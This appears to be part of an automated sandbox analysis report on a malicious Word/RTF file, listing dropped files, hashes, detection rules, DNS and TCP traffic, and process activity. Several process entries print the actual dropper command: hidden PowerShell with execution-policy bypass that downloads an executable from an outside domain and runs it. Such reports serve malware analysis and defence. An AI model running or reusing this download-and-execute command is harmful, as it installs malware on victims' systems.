                  SHA-512:E13CBD0DE56639628266C18A34CB8F60052B588719F44F4EBC700D0D22BFF8AED74DD576A36737C131F4CD44E819AD074A50E7CF74994B313CE402F3E5349D2D
                  Malicious:false
                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f35\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\f36\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Verdana;}{\f264\froman\fcharset238\fprq2 Times New Roman CE;}{\f265\froman\fcharset204\fprq2 Times New Roman Cyr;}{\f267\froman\fcharset161\fprq2 Times New Roman Greek;}..{\f268\froman\fcharset162\fprq2 Times New Roman Tur;}{\f269\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f270\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f271\froman\fcharset186\fprq2 Times New Roman Baltic;}..{\f272\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\f614\fswiss\fcharset238\fprq2 Tahoma CE;}{\f615\fswiss\fcharset204\fprq2 Tahoma Cyr;}{\f617\fswiss\fcharset161\fprq2 Tahoma Greek;}{\f618\fswiss\fcharset162\fprq2 Tahoma Tur;}..{\f619\fbid

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Underlever.Als

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289916
                  Entropy (8bit):7.020613805726218
                  Encrypted:false
                  SSDEEP:6144:zG2oSPADA0jxUN/4f3fW5Vfj0HyfC/nmZAgzoG:zGfDA0aNgPKVfj0UCeRR
                  MD5:73B129D4ADDF747733B355ABC2B1FEB3
                  SHA1:5721A84833ED7C601C569EC0AEA4D7C318F1D5EF
                  SHA-256:A906A2CD26285F34F1E66D51CEB807231DAC9F2E38E683EC210D5D8BF8DE155D
                  SHA-512:FBAC79148FD8E66DEEC4A5BC643F3750F3716093E23535D3E754FB634E05DD888FE63D33C8DFBEF64EFB5802DD3551659626F7FE2642CCBB5EAB493ECC49CE46
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):42672
                  Entropy (8bit):5.9123418499114395
                  Encrypted:false
                  SSDEEP:768:bbGiXey9Kx/7yErMNHtxB3ptmL3zQYs+gAcckh/:bblh9KBNrMNHt33ptmL3TsVAW
                  MD5:77EF5801EA5C5BD331B83B813A741DDB
                  SHA1:71E010937EE6EBFB40C9F26EDE4C4F972B1DE5B6
                  SHA-256:D8CEDD5AF29E3539D7A48CEE62022D17F660627D32004B133F30D94F88432853
                  SHA-512:0FBD91DBD747BCA751F21821369929B6AA42C446DD1A1C1A1F794FE380E27F1A431DA1A794942DEF6FF1B43F791071BD5F1BF4259C32C401444014A318050C22
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8...k...k...k..lk...k0..j...k0..j...k0..j...k0..j...k...j...k...k..k...j...k...j...k...k...k..hk...k...j...kRich...k........PE..d......`.........." .....P...<.......R....................................................`.........................................`x..t....x..................................L....j..p...........................Pk..8............`...............................text....O.......P.................. ..`.rdata..Z#...`...$...T..............@..@.data................x..............@....pdata...............z..............@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):166947
                  Entropy (8bit):6.232611855964163
                  Encrypted:false
                  SSDEEP:3072:RROFUi/2PM0FQGxtMXG7aWTsHHAz9pjluR6xpRc8koGJG2R818X0BH8X1:mOvFQxWaTAz9qR6xNGJvz0BHM1
                  MD5:A06929ADEAD968870A2E6952CB7A0BD4
                  SHA1:CE8A3D0077CDB123ADECE62E4777BD0738E272EB
                  SHA-256:36B82AE3414F0941AED79604A17AB33994D3C0E868AA3DDAFD3B05F206BD4131
                  SHA-512:A6FD18D5996D92EF0A4C1BB3609BEF05F9F9E1044448E227B903292FE0B5773A89C8A02DE5CF2E1F560B176243B84BDF73353974FD66D710E1D36E31A5A10DFB
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........b........&"...%.....^......P.........D.....................................hL....`... ......................................p...........'........... ..................................................(....................................................text...............................`..`.data... ...........................@....rdata...l.......n..................@..@.pdata....... ......................@..@.xdata.......@......................@..@.bss.........`...........................edata.......p......................@..@.idata...'.......(...0..............@....CRT....X............X..............@....tls.................Z..............@....rsrc................\..............@....reloc...............`..............@..B................................................................................................................................

                  C:\Users\user\AppData\Roaming\file.exe

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:dropped
                  Size (bytes):676320
                  Entropy (8bit):7.876330435838718
                  Encrypted:false
                  SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                  MD5:A1AFEF77EEC567ADB1076E8679AF207B
                  SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                  SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                  SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                  Malicious:true
                  Yara Hits:
                  • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 6%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....Oa.................f....... ...3............@..................................)....@.................................D........p..H............9..@............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...0...........................rsrc...H....p......................@..@................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\Desktop\~$PO0015922.doc

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.503835550707525
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                  Malicious:false
                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                  Static File Info

                  General

                  File type:Unicode text, UTF-8 text, with very long lines (4154), with CRLF line terminators
                  Entropy (8bit):3.2054554743535415
                  TrID:
                  • Rich Text Format (5005/1) 55.56%
                  • Rich Text Format (4004/1) 44.44%
                  File name:TEPO0015922.doc
                  File size:248144
                  MD5:364dc6c0e8a18b796aa535516d04cb53
                  SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
                  SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
                  SHA512:f2efd5cb38e6474c83268e7454e268eee06f342cb5b55575a94a3cd206bf7096a8a4ca72a89f88e35668d8d4e39243ef5c2f097f438dd7a7c09716c2d4c3a1c0
                  SSDEEP:1536:i1iO8Lcs5Kpn0Ws/zhiordTpM6DiJW3BPLN4rZVzFz76mAg5eeVhMDw5wfL8:i+5xdXGVzFtr5RDAw5wfY
                  TLSH:C7342EA4654F4872E208AC5DA4D47141AEB6FED330C598B123AFF031DF55AF2AEC019B
                  File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                  File Icon

                  Icon Hash:e4eea2aaa4b4b4a4

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 18, 2023 05:35:09.067533016 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.067636967 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.068167925 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.080630064 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.080676079 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.193610907 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.194020987 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.205684900 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.205714941 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.206222057 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.206656933 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.456878901 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.456933022 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.536165953 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.536231041 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.536279917 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.536362886 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.536362886 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.536412001 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.536447048 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.536469936 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.536469936 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.536509991 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.536788940 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.536919117 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.537058115 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.537101030 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.537123919 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.537152052 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.537184000 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.540963888 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.573869944 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.574013948 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.574083090 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.574112892 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.574141979 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.574281931 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.574593067 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.574716091 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.574747086 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.574773073 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.574845076 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.574954987 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.575092077 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.575222015 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.575278997 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.575308084 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.575359106 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.575377941 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.576313019 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.607295036 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.607373953 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.607841969 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.607882977 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.608021975 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.608021975 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609024048 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.609095097 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.609266996 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609266996 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609287977 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.609328985 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609383106 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609592915 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.609671116 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.609759092 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609759092 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.609777927 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.610021114 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.610275030 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.610409021 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.610429049 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.610429049 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.610455990 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.610553026 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.610553026 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.610868931 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611001015 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611136913 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611136913 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611160994 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611284971 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611387968 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611470938 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611557961 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611638069 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611654997 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611707926 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611742973 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.612143993 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.642641068 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.642848969 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.642885923 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.642918110 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.643048048 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.643048048 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.643198013 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.643323898 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.643379927 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.643404007 CET44349171149.102.154.62192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 18, 2023 05:35:09.025356054 CET5586853192.168.2.228.8.8.8
                  Mar 18, 2023 05:35:09.050968885 CET53558688.8.8.8192.168.2.22
                  Mar 18, 2023 05:35:11.517184019 CET4968853192.168.2.228.8.8.8
                  Mar 18, 2023 05:35:11.542437077 CET53496888.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 18, 2023 05:35:09.025356054 CET192.168.2.228.8.8.80x478cStandard query (0)thekaribacruisecompany.comA (IP address)IN (0x0001)false
                  Mar 18, 2023 05:35:11.517184019 CET192.168.2.228.8.8.80x78e0Standard query (0)thekaribacruisecompany.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 18, 2023 05:35:09.050968885 CET8.8.8.8192.168.2.220x478cNo error (0)thekaribacruisecompany.com149.102.154.62A (IP address)IN (0x0001)false
                  Mar 18, 2023 05:35:11.542437077 CET8.8.8.8192.168.2.220x78e0No error (0)thekaribacruisecompany.com149.102.154.62A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • thekaribacruisecompany.com

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:05:34:16
                  Start date:18/03/2023
                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Imagebase:0x13f020000
                  File size:1423704 bytes
                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:4
                  Start time:05:34:20
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x4a870000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:6
                  Start time:05:34:20
                  Start date:18/03/2023
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x13fb60000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  Reputation:high

                  General

                  Target ID:7
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:9
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Users\user\AppData\Roaming\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x400000
                  File size:676320 bytes
                  MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                  Antivirus matches:
                  • Detection: 6%, ReversingLabs
                  Reputation:low

                  General

                  Target ID:10
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:12
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x13f540000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  Reputation:high

                  General

                  Target ID:13
                  Start time:05:34:38
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:15
                  Start time:05:34:39
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Target ID:16
                  Start time:05:34:39
                  Start date:18/03/2023
                  Path:C:\Users\user\AppData\Roaming\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x400000
                  File size:676320 bytes
                  MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Target ID:18
                  Start time:05:34:39
                  Start date:18/03/2023
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x13fa40000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
